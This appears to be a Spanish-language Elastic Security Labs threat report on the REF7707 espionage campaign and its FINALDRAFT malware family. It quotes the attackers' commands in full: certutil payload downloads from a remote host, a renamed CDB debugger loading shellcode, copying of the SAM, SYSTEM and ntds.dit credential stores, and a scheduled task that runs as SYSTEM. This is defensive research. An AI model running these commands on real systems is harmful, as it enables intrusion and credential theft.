De Sudamérica al Sudeste Asiático: La frágil red de REF7707

REF7707 resumido

Elastic Security Labs estuvo monitoreando una campaña dirigida al Ministerio de Relaciones Exteriores de una nación sudamericana que tiene vínculos con otras vulnerabilidades en el sudeste asiático. Seguimos esta campaña como REF7707.

Si bien la campaña REF7707 se caracteriza por un conjunto de intrusiones novedoso, muy capaz y bien diseñado, los propietarios de la campaña exhibieron una gestión de campaña deficiente y prácticas de evasión inconsistentes.

El conjunto de intrusiones empleado por REF7707 incluye nuevas familias de malware a las que nos referimos como FINALDRAFT, GUIDLOADER y PATHLOADER. Proporcionamos un análisis detallado de sus funciones y capacidades en el reporte de análisis de malware de REF7707 - You've Got Malware: FINALDRAFT Hides in Your Drafts.

Conclusiones clave

• REF7707 empleó un nuevo malware contra múltiples objetivos
• El malware FINALDRAFT tiene una variante para Windows y Linux
• REF7707 empleó un LOLBin poco común para obtener la ejecución del punto final
• Uso intensivo de la nube y servicios de terceros para C2
• Los atacantes emplearon una seguridad operativa débil que expuso malware adicional e infraestructura no empleada en esta campaña.

Descripción general de la campaña

A fines de noviembre de 2024, Elastic Security Labs observó un conjunto reducido de alertas de comportamiento de puntos finales en el Ministerio de Relaciones Exteriores de un país sudamericano. A medida que continuó la investigación, descubrimos una campaña extensa y un conjunto de intrusiones que incluía malware nuevo, una segmentación sofisticada y una cadencia operativa madura.

Si bien partes de la campaña mostraron un alto nivel de planeación y competencia técnica, numerosos descuidos tácticos expusieron muestras de preproducción de malware, infraestructura y víctimas adicionales.

Diseño de campaña (modelo de diamante)

Elastic Security Labs emplea el modelo de diamante para describir las relaciones de alto nivel entre adversarios, capacidades, infraestructura y víctimas de intrusiones. Si bien el modelo de diamante se emplea más comúnmente con intrusiones individuales y aprovechando el subprocesamiento de actividades (sección 8) para crear relaciones entre incidentes, un modelo centrado en el adversario (sección 7.1.4) Este enfoque permite obtener un único diamante, aunque esté desordenado.

Flujo de ejecución

Cadena de ejecución primaria

REF7707 fue identificado inicialmente a través de la telemetría de Elastic Security del Ministerio de Relaciones Exteriores de una nación sudamericana. Observamos una táctica LOLBin común empleando la aplicación certutil de Microsoft para descargar archivos de un servidor remoto y almacenarlos localmente.

certutil  -urlcache -split -f https://[redacted]/fontdrvhost.exe C:\ProgramData\fontdrvhost.exe

certutil  -urlcache -split -f https://[redacted]/fontdrvhost.rar C:\ProgramData\fontdrvhost.rar

certutil  -urlcache -split -f https://[redacted]/config.ini C:\ProgramData\config.ini

certutil  -urlcache -split -f https://[redacted]/wmsetup.log C:\ProgramData\wmsetup.log

El servidor sitio web que alojaba fontdrvhost.exe, fontdrvhost.rar, config.ini y wmsetup.log estaba ubicado dentro de la misma organización; sin embargo, no ejecutaba el Agente Elastic. Este fue el primer movimiento lateral observado y proporcionó información sobre la intrusión. Analizaremos estos archivos con más detalle, pero por ahora, fontdrvhost.exe es una herramienta de depuración, config.ini es un archivo INI modificado y fontdrvhost.rar no se pudo recuperar.

WinrsHost.exe

Se empleó el complemento Shell remoto de Administración remota de Windows (WinrsHost.exe) para descargar los archivos a este sistema desde un sistema de origen desconocido en una red conectada. El complemento es el proceso del lado del cliente que emplea la Administración remota de Windows. Esto indica que los atacantes ya poseían credenciales de red válidas y las estaban empleando para realizar movimientos laterales desde un host previamente comprometido en el entorno. Se desconoce cómo se obtuvieron estas credenciales; es posible que se obtuvieran del servidor sitio web que aloja los archivos sospechosos.

El atacante descargó fontdrvhost.exe, fontdrvhost.rar, config.ini y wmsetup.log al directorio C:\ProgramData\ ; desde allí, el atacante se movió a varios otros puntos finales de Windows. Si bien no podemos identificar todas las credenciales expuestas, notamos el uso de una cuenta de administrador local para descargar estos archivos.

Luego de las descargas desde el servidor sitio web hasta el punto final, vimos un conjunto de reglas de comportamiento que se activaban en rápida sucesión.

En seis sistemas Windows, observamos la ejecución de un binario no identificado (08331f33d196ced23bb568689c950b39ff7734b7461d9501c404e2b1dc298cc1) como hijo de Services.exe. Este binario sospechoso emplea un nombre de archivo asignado de forma pseudoaleatoria que consta de seis letras mayúsculas y minúsculas con una extensión .exe y está ubicado en la ruta C:\Windows\ (ejemplo: C:\Windows\cCZtzzwy.exe). No pudimos recopilar este archivo para su análisis, pero deducimos que se trata de una variante de PATHLOADER según el tamaño del archivo (170,495 bytes) y su ubicación. Este archivo se pasó entre sistemas mediante SMB.

FontDrvHost.exe

Una vez que el atacante recopiló fontdrvhost.exe, fontdrvhost.rar, config.ini y wmsetup.log, ejecutó fontdrvhost.exe (cffca467b6ff4dee8391c68650a53f4f3828a0b5a31a9aa501d2272b683205f9) para continuar con la intrusión. fontdrvhost.exe es una versión renombrada del depurador firmado por Windows CDB.exe. El abuso de este binario permitió a nuestros atacantes ejecutar código shell malicioso entregado en el archivo config.ini bajo la apariencia de binarios confiables.

CDB es un depurador que tiene más de 15 años. Al investigar la frecuencia con la que se envió con archivos sospechosos a VirusTotal, vemos una mayor actividad en 2021 y un aceleramiento agresivo a partir de fines de 2024.

CDB es un archivo LOLBas documentado, pero no hubo mucha investigación publicada sobre cómo se puede abusar de él. El investigador de seguridad mrd0x escribió un excelente análisis de CDB que describe cómo se puede emplear para ejecutar shellcode, iniciar ejecutables, ejecutar DLL, ejecutar comandos de shell y finalizar soluciones de seguridad (e incluso un análisis más antiguo de 2016 usándolo como un ejecutor de shellcode). Si bien no es una novedad, se trata de una metodología de ataque poco común y podría usar con otros metadatos de intrusión para vincular a los actores en distintas campañas.

Si bien no se recopiló config.ini para su análisis, contenía un mecanismo a través del cual fontdrvhost.exe cargó el shellcode; la forma en que se invocó es similar a FINALDRAFT.

C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData\fontdrvhost.exe

• -cf - especifica la ruta y el nombre de un archivo de script. Este archivo de script se ejecuta tan pronto como se inicia el depurador.
• config.ini - este es el script que se debe cargar
• -o - depura todos los procesos iniciados por la aplicación de destino

Luego fontdrvhost.exe generó mspaint.exe e inyectó código shell en él.

Los ingenieros inversos de Elastic Security Labs analizaron este código shell para identificar y caracterizar el malware FINALDRAFT. Finalmente, fontdrvhost.exe inyectó código shell adicional en la memoria (6d79dfb00da88bb20770ffad636c884bad515def4f8e97e9a9d61473297617e3) que también fue identificado como el malware FINALDRAFT.

Como se describe en el análisis de FINALDRAFT, el malware tiene como valor predeterminado mspaint.exe o conhost.exe si no se proporciona ningún parámetro de destino para un comando relacionado con la inyección.

Comprobaciones de conectividad

El adversario realizó varias pruebas de conectividad empleando el comando ping.exe y mediante PowerShell.

El cmdlet Invoke-WebRequest de PowerShell es similar a wget o curl, que extrae el contenido de un recurso sitio web. Este cmdlet se puede emplear para descargar herramientas desde la línea de comandos, pero ese no fue el caso aquí. Es más probable que estas solicitudes en contexto con varios pingsean comprobaciones de conectividad.

graph.microsoft[.]com y login.microsoftonline[.]com son sitios de propiedad legítima de Microsoft que brindan tráfico de API y GUI sitio web para el servicio de email en la nube Outlook de Microsoft y otros productos de Office 365 .

• ping graph.microsoft[.]com
• ping www.google[.]com
• Powershell Invoke-WebRequest -Uri \"hxxps://google[.]com\
• Powershell Invoke-WebRequest -Uri \"hxxps://graph.microsoft[.]com\" -UseBasicParsing
• Powershell Invoke-WebRequest -Uri \"hxxps://login.microsoftonline[.]com\" -UseBasicParsing

digert.ictnsc[.]com y support.vmphere[.]com eran infraestructuras propiedad del adversario.

• ping digert.ictnsc[.]com
• Powershell Invoke-WebRequest -Uri \"hxxps://support.vmphere[.]com\" -UseBasicParsing

Cubrimos más sobre estos dominios de red en la sección de infraestructura a continuación.

Reconocimiento/enumeración/recolección de credenciales

El adversario ejecutó un script desconocido llamado SoftwareDistribution.txt usando la utilidad diskshadow.exe , extrajo las secciones del registro SAM, SECURITY y SYSTEM y copió la base de datos de Active Directory (ntds.dit). Estos materiales contienen principalmente credenciales y metadatos de credenciales. El adversario empleó la utilidad 7zip para comprimir los resultados:

diskshadow.exe /s C:\\ProgramData\\SoftwareDistribution.txt

cmd.exe /c copy z:\\Windows\\System32\\config\\SAM C:\\ProgramData\\[redacted].local\\SAM /y

cmd.exe /c copy z:\\Windows\\System32\\config\\SECURITY C:\\ProgramData\\[redacted].local\\SECURITY /y

cmd.exe /c copy z:\\Windows\\System32\\config\\SYSTEM C:\\ProgramData\\[redacted].local\\SYSTEM /y

cmd.exe /c copy z:\\windows\\ntds\\ntds.dit C:\\ProgramData\\[redacted].local\\ntds.dit /y

7za.exe a [redacted].local.7z \"C:\\ProgramData\\[redacted].local\\\"

El adversario también enumeró información sobre el sistema y el dominio:

systeminfo

dnscmd . /EnumZones

net group /domain

C:\\Windows\\system32\\net1 group /domain

quser

reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID

reg query \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID\"

reg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID\"

Persistencia

La persistencia se logró empleando una tarea programada que invocaba el depurador renombrado CDB.exe y el archivo INI convertido en arma cada minuto como SYSTEM. Esta metodología garantizó que FINALDRAFT residiera en la memoria.

schtasks /create /RL HIGHEST /F /tn \"\\Microsoft\\Windows\\AppID\\EPolicyManager\" 
/tr \"C:\\ProgramData\\fontdrvhost.exe -cf C:\\ProgramData\\config.ini -o C:\\ProgramData\\fontdrvhost.exe\" 
/sc MINUTE /mo 1 /RU SYSTEM

• schtasks - el programa de tareas programadas
• /create - crea una nueva tarea programada
• /RL HIGHEST - especifica el nivel de ejecución del trabajo, HIGHEST se ejecuta con el nivel más alto de privilegios
• /F - suprimir advertencias
• /tn \\Microsoft\\Windows\\AppID\\EPolicyManager\ - nombre de la tarea, que intenta reflejar una tarea programada de apariencia auténtica
• /tr \"C:\\ProgramData\\fontdrvhost.exe -cf C:\\ProgramData\\config.ini -o C:\\ProgramData\\fontdrvhost.exe\" - tarea a ejecutar, en este caso los comandos fontdrvhost.exe que cubrimos anteriormente
• /sc MINUTE - tipo de programación, MINUTE especifica que se ejecutará en intervalos de minutos
• /mo 1 - modificador, define 1 para el intervalo de programación
• /RU SYSTEM - define bajo qué cuenta se ejecutará; en esta situación, la tarea se ejecutará como el usuario del SISTEMA

Análisis de FINALDRAFT

Un análisis técnico profundo que describe las capacidades y la arquitectura del malware FINALDRAFT y PATHLOADER está disponible aquí. En un nivel alto, FINALDRAFT es una herramienta de administración remota bien diseñada y completa con la capacidad de aceptar módulos complementarios que amplían la funcionalidad y redirigen el tráfico de red internamente por múltiples medios.

Aunque FINALDRAFT puede establecer comando y control empleando varios medios, los más notables son los medios que observamos en nuestro entorno víctima, el abuso de la API Graph de Microsoft. Observamos por primera vez este tipo de C2 de terceros en SIESTAGRAPH, que informamos en diciembre de 2022.

Este tipo de comando y control es un desafío para los defensores de las organizaciones que dependen en gran medida de la visibilidad de la red para ser atacadas. Una vez completada la ejecución inicial y el registro, toda la comunicación posterior se realiza a través de la infraestructura legítima de Microsoft (graph.microsoft[.]com) y se integra con las demás estaciones de trabajo de la organización. También admite la funcionalidad de retransmisión que le permite redireccionar el tráfico a otros sistemas infectados. Evade las defensas que dependen de la detección de intrusiones basadas en la red y de los indicadores de inteligencia de amenazas.

PATHLOADER y GUIDLOADER

Tanto PATHLOADER como GUIDLOADER se emplean para descargar y ejecutar códigos shell cifrados en la memoria. Fueron descubiertos en VirusTotal mientras se investigaba la infraestructura C2 y las cadenas identificadas dentro de una captura de memoria FINALDRAFT. Sólo se observaron en asociación con cargas útiles FINALDRAFT.

Una muestra de mayo 2023 en VirusTotal es el binario identificado más antiguo del conjunto de intrusiones REF7707. Esta muestra fue enviada por primera vez por un usuario sitio web de Tailandia, dwn.exe (9a11d6fcf76583f7f70ff55297fb550fed774b61f35ee2edd95cf6f959853bcf) es una variante de PATHLOADER que carga un binario FINALDRAFT cifrado desde poster.checkponit[.]com y support.fortineat[.]com.

Entre junio y agosto de 2023, un usuario sitio web de VirusTotal de Hong Kong cargó 12 muestras de GUIDLOADER. Cada una de estas muestras tenía modificaciones menores en la forma en que se descargaba la carga útil cifrada y se configuraron para usar dominios FINALDRAFT:

• poster.checkponit[.]com
• support.fortineat[.]com
• Google Firebase (firebasestorage.googleapis[.]com)
• Pastebin (pastebin[.]com)
• Un sistema de almacenamiento sitio web público de una universidad del Sudeste Asiático

Algunas muestras de GUIDLOADER parecen inacabadas o rotas, con rutinas de descifrado no funcionales, mientras que otras contienen cadenas de depuración incrustadas en el binario. Estas variaciones sugieren que las muestras fueron parte de un proceso de desarrollo y prueba.

FINALDRAFT bridging OS’

A finales de 2024, se cargaron dos variantes de Linux ELF FINALDRAFT en VirusTotal, una de Estados Unidos y otra de Brasil. Estas muestras presentan una versatilidad C2 similar y una reimplementación parcial de los comandos disponibles en la versión de Windows. Se extrajeron las URL de estos archivos para support.vmphere[.]com, update.hobiter[.]com y pastebin.com.

Análisis de infraestructura

En el reporte de análisis de malware FINALDRAFT, se identificaron varios dominios en las muestras recopiladas en la intrusión REF7707 y otras muestras se identificaron a través de la similitud del código.

Hashes de banner de servicio

Una búsqueda en Censys de hobiter[.]com (el dominio observado en la variante ELF de FINALDRAFT, analizada en la sección anterior) devuelve una dirección IP de 47.83.8.198. Este servidor tiene su sede en Hong Kong y presta servicio a los puertos 80 y 443. La cadena “hobiter[.]com” está asociada con el certificado TLS en el puerto 443. Una consulta pivote de Censys sobre el hash del banner de servicio de este puerto produce seis servidores adicionales que comparten ese hash (siete en total).

Dos servidores (203.232.112[.]186 y 13.125.236[.]162) no comparten el mismo perfil que los otros cinco. Si bien el hash del banner de servicio aún coincide, no está en el puerto 443, sino en los puertos 15701, 15702, 15703 y 15709. Además, los puertos en cuestión no parecen soportar comunicaciones TLS. No los atribuimos a REF7707 con un alto grado de confianza, pero los incluimos para completar.

Los otros cinco servidores, incluido el servidor original “hobiter”, comparten varias similitudes:

• Coincidencia de hash del banner de servicio en el puerto 443
• Geolocalizaciones del Sudeste Asiático
• Windows OS
• Certificados TLS emitidos por Cloudflare
• La mayoría tienen el mismo ASN perteneciente a Alibaba

Hobiter y VSphere

update.hobiter[.]com y support.vmphere[.]com se encontraron en un binario ELF (biosets.rar) a partir 13 de diciembre 2024. Ambos dominios fueron registrados hace más de un año, el 12 de septiembre de 2023. Este binario ELF presenta una versatilidad C2 similar y una reimplementación parcial de los comandos disponibles en la versión de Windows de FINALDRAFT.

Una búsqueda de servidor de nombres de hobiter[.]com y vmphere[.]com arroja solo un registro de servidor de nombres de Cloudflare para cada uno y ningún registro A. La búsqueda de sus subdominios conocidos nos proporciona registros A que apuntan a direcciones IP propiedad de Cloudflare.

ICTNSC

ictnsc[.]com está directamente asociado con la intrusión REF7707 anterior a partir de una verificación de conectividad (ping digert.ictnsc[.]com) realizada por los atacantes. El servidor asociado con este dominio (8.213.217[.]182) fue identificado a través del hash del banner del servicio Censys en el servicio HTTPS descrito anteriormente. Al igual que la otra infraestructura identificada, el subdominio se resuelve en direcciones IP propiedad de Cloudflare y el dominio principal solo tiene un registro NS de Cloudflare. ictnsc[.]com se registró el 8 de febrero de 2023.

Si bien no podemos confirmar que la asociación sea maliciosa, cabe señalar que el dominio ict.nsc[.]ru es propiedad sitio web del Centro Federal de Investigación de Información y Tecnologías Computacionales, a menudo denominado FRC o ICT. Esta organización rusa realiza investigaciones en diversas áreas como modelado informático, ingeniería de software, procesamiento de datos, inteligencia artificial y computación de alto rendimiento.

Aunque no se observó en la intrusión REF7707, el dominio que observamos (ictnsc[.]com) tiene un subdominio ict (ict.ictnsc[.]com), que es sorprendentemente similar a ict.nsc[.]ru. Nuevamente, no podemos confirmar si están relacionados con el FRC o ITC legítimo, parece que el actor de amenazas pretendía que los dominios fueran similares, se fusionaran o se confundieran entre sí.

Autodiscovar

Autodiscovar[.]com no se asoció directamente con ningún malware de FINALDRAFT. Se asoció indirectamente con la infraestructura REF7707 a través de pivotes en identificadores de infraestructura sitio web. El dominio principal solo tiene un registro NS de Cloudflare. Un subdominio identificado a través de VirusTotal (cloud.autodiscovar[.]com) apunta a direcciones IP propiedad de Cloudflare. Este nombre de dominio se parece a otras infraestructuras sitio web FINALDRAFT y REF7707 y comparte el hash del banner del servicio HTTPS. Este dominio fue registrado el 26 de agosto de 2022.

Enlaces D y nubes de máquinas virtuales

d-links[.]net y vm-clouds[.]net se registraron el 12 septiembre 2023, el mismo día que hobiter[.]com y vmphere[.]com. Los servidores que alojan estos sitios también comparten el mismo hash de banner del servicio HTTPS. No están directamente asociados con el malware FINALDRAFT ni tienen subdominios enrutables actuales, aunque pol.vm-clouds[.]net se registró previamente.

Fortineat

support.fortineat[.]com se codificó de forma rígida en la muestra PATHLOADER (dwn.exe). Durante nuestro análisis del dominio, descubrimos que actualmente no estaba registrado. Para identificar otras muestras que se comunican con el dominio, nuestro equipo registró este dominio y configuró un servidor sitio web para escuchar las conexiones entrantes.

Registramos intentos de conexión a través del puerto 443, donde identificamos un patrón de bytes entrantes específico. Las conexiones procedían de ocho compañías diferentes de telecomunicaciones e infraestructura de Internet en el sudeste asiático, lo que indica posibles víctimas del conjunto de intrusión REF7707.

Punto de control

poster.checkponit[.]com Se observó en cuatro muestras de GUIDLOADER y una muestra de PATHLOADER entre mayo y julio de 2023, y se empleó para alojar el código shell cifrado de FINALDRAFT. El registro checkponit[.]com se creó el 26 de agosto 2022. Actualmente no hay registros A para checkponit[.]com o poster.checkponit[.]com.

Infraestructura de terceros

Las variantes FINALDRAFT PE y ELF emplean graph.microsoft[.]com de Microsoft para comando y control a través de Graph API. Este servicio es omnipresente y se emplea para procesos comerciales críticos de empresas que emplean Office 365. Se recomienda encarecidamente a los defensores NO bloquear este dominio a menos que comprendan las ramificaciones comerciales.

El servicio Firebase de Google (firebasestorage.googleapis[.]com), Pastebin (pastebin[.]com) y una universidad del sudeste asiático son servicios de terceros que se emplean para alojar la carga útil cifrada para que los cargadores (PATHLOADER y GUIDLOADER) descarguen y descifren la última etapa de FINALDRAFT.

Cronología de REF7707

Conclusión

REF7707 fue descubierto mientras se investigaba una intrusión en el Ministerio de Relaciones Exteriores de una nación sudamericana.

La investigación reveló malware nuevo como FINALDRAFT y sus diversos cargadores. Estas herramientas se implementaron y respaldaron empleando funciones integradas del sistema operativo que son difíciles de detectar para las herramientas antimalware tradicionales.

FINALDRAFT adopta el servicio de API de gráficos de Microsoft para comando y control con el fin de minimizar los indicadores maliciosos que serían observables por los sistemas tradicionales de detección y prevención de intrusiones basados en red. Las plataformas de alojamiento de terceros para el almacenamiento de carga útil cifrada también suponen un desafío para estos sistemas en las primeras etapas de la cadena de infección.

Una descripción general de los remitentes y pivotes de VirusTotal que emplean los indicadores de este reporte muestra una presencia geográfica relativamente fuerte en el Sudeste Asiático y Sudamérica. De manera similar, SIESTAGRAPH fue el primer abuso de API de gráficos en tiempo real que observamos, y (REF2924) involucró un ataque al Ministerio de Relaciones Exteriores de una nación del sudeste asiático.

En Elastic Security Labs, promovemos las capacidades defensivas en todos los dominios de seguridad de la información operados por profesionales expertos para mitigar mejor las amenazas avanzadas.

REF7707 a través de MITRE ATT&CK

Elastic usa el framework MITRE ATT&CK para documentar tácticas, técnicas y procedimientos comunes que las amenazas persistentes avanzadas emplean contra las redes empresariales.

• Reconocimiento
• Ejecución
• Persistencia
• Escalada de privilegios
• Evasión de defensa
• Acceso a credenciales
• Descubrimiento
• Movimiento lateral
• Colección
• Comando y control
• Exfiltración

Detectando REF7707

YARA

• Borrador final (Windows)
• Borrador final (Linux)
• FINALDRAFT (Multi-OS)
• CARGADOR DE RUTAS
• CARGADOR DE GUÍAS

Observaciones

En esta investigación se discutieron los siguientes observables.

Referencias

A lo largo de la investigación anterior se hizo referencia a lo siguiente:

• https://www.elastic.co/security-labs/finaldraft
• https://mrd0x.com/the-power-of-cdb-debugging-tool/
• https://web.archive.org/web/20210305190100/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html

Acerca de Elastic Security Labs

Elastic Security Labs se dedica a crear un cambio positivo en el panorama de amenazas al proporcionar investigación disponible públicamente sobre amenazas emergentes.

Siga a Elastic Security Labs en X @elasticseclabs y consulte nuestra investigación en www.elastic.co\/security-labs\/. Puede ver la tecnología que aprovechamos para esta investigación y más consultando Elastic Security.